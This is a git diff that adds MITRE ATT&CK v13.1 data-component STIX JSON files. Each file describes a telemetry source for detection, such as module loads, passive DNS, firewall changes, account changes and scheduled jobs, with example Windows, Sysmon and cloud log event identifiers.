diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json
new file mode 100644
index 0000000000000000000000000000000000000000..df34fe5f1947c21ae8988c91393981201ab6669a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--f49fa3e9-8069-4f6d-bf0d-696da4e6e955",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Module Load",
+ "description": "Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0edd522-0aef-46b3-8efa-2bd334ce4242.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0edd522-0aef-46b3-8efa-2bd334ce4242.json
new file mode 100644
index 0000000000000000000000000000000000000000..17319bdfc02c24d38f844951b57d187904edd7ab
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c0edd522-0aef-46b3-8efa-2bd334ce4242.json
@@ -0,0 +1,24 @@
+{
+ "type": "bundle",
+ "id": "bundle--3b7b6c62-dffb-4f54-8cdd-e207a365ca3f",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-11-07T19:45:00.000Z",
+ "name": "Pod Metadata",
+ "description": "Contextual data about a pod and activity around it such as name, ID, namespace, or status",
+ "x_mitre_data_source_ref": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--c0edd522-0aef-46b3-8efa-2bd334ce4242",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a.json
new file mode 100644
index 0000000000000000000000000000000000000000..f355174182079e1028efa84ec15a61dde02cf244
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--0adc0958-ff0c-4467-b25c-e028ce85498e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Firewall Disable",
+ "description": "Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4.json
new file mode 100644
index 0000000000000000000000000000000000000000..abbca8ef3403a6fb36ca530ee9e75512bde9e6c4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--add45184-530f-4aea-99db-9ee22ca41124",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.275Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.275Z",
+ "name": "Passive DNS",
+ "description": "Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77.json
new file mode 100644
index 0000000000000000000000000000000000000000..b2f3ce8a30b680026b55ecc127814948ba04164e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--b73e05be-10c9-42be-8079-570a0f9869ee",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--d27b0089-2c39-4b6c-84ff-303e48657e77",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "User Account Modification",
+ "description": "Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f.json
new file mode 100644
index 0000000000000000000000000000000000000000..a861350ae7c4a1a45d65fc99db83e17d6c8eb95a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--2aa51d8c-be3f-4a7b-85de-31052a3029f8",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Firewall Rule Modification",
+ "description": "Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee.json
new file mode 100644
index 0000000000000000000000000000000000000000..15c335c2a1e07415cdabcbff6ef688b5c519b39e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--1cc66108-76d2-4cdd-8b14-bf3d79669aa5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--d46272ce-a0fe-4256-855e-738de7bb63ee",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.275Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.275Z",
+ "name": "Volume Modification",
+ "description": "Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96.json
new file mode 100644
index 0000000000000000000000000000000000000000..d3fb4bbb335261d1f4278e4c19454d7876d2ceae
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--6555fe56-2f76-4c9b-b591-9be610e722c5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Process Modification",
+ "description": "Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91.json
new file mode 100644
index 0000000000000000000000000000000000000000..227a42ce4e70685af87b6ea4770b749e4a39b070
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--bae12924-033d-4f78-9ff7-bb9d751e4f0b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--d6257b8e-869c-41c0-8731-fdca40858a91",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "User Account Deletion",
+ "description": "Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json
new file mode 100644
index 0000000000000000000000000000000000000000..e002d83d9d58a8353793d8224761a91dd54cd117
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--a6a3c3e0-f9bd-4e7a-9a28-2b9dafd752ec",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Windows Registry Key Modification",
+ "description": "Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d.json
new file mode 100644
index 0000000000000000000000000000000000000000..9378afbeebd262c4752089d692560bbbd3557742
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--615cbd9c-e83e-4075-a0d2-17945a2adafb",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--deb22295-7e37-4a3b-ac6f-c86666fbe63d",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "User Account Creation",
+ "description": "Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984.json
new file mode 100644
index 0000000000000000000000000000000000000000..dbef7cffc211a9444a5555d2bd55c90b6a2d71d6
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--bb6e7410-9ca7-4146-903d-625571c569c5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--f1eb6ea9-f3ab-414f-af35-2d5427199984",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Snapshot Modification",
+ "description": "Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json
new file mode 100644
index 0000000000000000000000000000000000000000..90cd41c561847d58f247aa119f66403c300c45f3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--7a920082-2605-437e-a31c-3ceb42d4b682",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "Scheduled Job Creation",
+ "description": "Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json
new file mode 100644
index 0000000000000000000000000000000000000000..bf1edaaf7535494fcdd87496a15cf7af1be39cb1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--d04548c1-09ae-4ebc-9c7e-caad76f36077",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.275Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.275Z",
+ "name": "Network Share Access",
+ "description": "Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79.json
new file mode 100644
index 0000000000000000000000000000000000000000..6e32e9d0344d28d42da92f94a877c93dd2222f74
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--9080df8f-c6f9-49d6-9797-212d73209424",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--f5a9a1dd-82f9-41a3-85b8-13e5b9cd6c79",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Driver Metadata",
+ "description": "Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking",
+ "x_mitre_data_source_ref": "x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f.json
new file mode 100644
index 0000000000000000000000000000000000000000..066bfa6677fe6558b6b87b0d8c9f479f8d5e37a8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--3ee03876-86a4-44b6-bf09-54328c67fa13",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--f8213cde-6b3a-420d-9ab7-41c9af1a919f",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Instance Start",
+ "description": "Activation or invocation of an instance (ex: instance.start within GCP Audit Logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json
new file mode 100644
index 0000000000000000000000000000000000000000..84b7f5ffd097cd4271359142d184ee5019e2742a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--fd081486-a35f-45a0-933a-9e1721976a06",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "Scheduled Job Modification",
+ "description": "Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fafaa705-ec08-4405-ac62-288c252e520d.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fafaa705-ec08-4405-ac62-288c252e520d.json
new file mode 100644
index 0000000000000000000000000000000000000000..6861c1a73243c5551ce83b422aaf41b30ce1cc10
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fafaa705-ec08-4405-ac62-288c252e520d.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--90dad137-9bf7-439d-a4cc-b1c4675e1319",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-20T20:54:47.331Z",
+ "name": "Cluster Metadata",
+ "description": "Contextual data about a cluster and activity around it such as name, namespace, age, or status",
+ "x_mitre_data_source_ref": "x-mitre-data-source--c3af32ff-65c5-4ea8-912a-fb4a85197239",
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--fafaa705-ec08-4405-ac62-288c252e520d",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
